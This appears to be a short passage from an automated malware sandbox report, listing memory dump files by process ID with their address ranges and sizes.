memory/4792-170-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/4792-174-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/4792-172-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/4792-171-0x0000000140001844-mapping.dmp
-
memory/4792-173-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/4808-153-0x0000000000000000-mapping.dmp
-
memory/4820-164-0x0000000000000000-mapping.dmp
-
memory/4896-161-0x0000000000000000-mapping.dmp
-
memory/4940-167-0x0000000000000000-mapping.dmp
-
memory/4976-136-0x0000000000000000-mapping.dmp
-
memory/4976-138-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmpFilesize
10.8MB
-
memory/4976-137-0x0000021F42470000-0x0000021F42492000-memory.dmpFilesize
136KB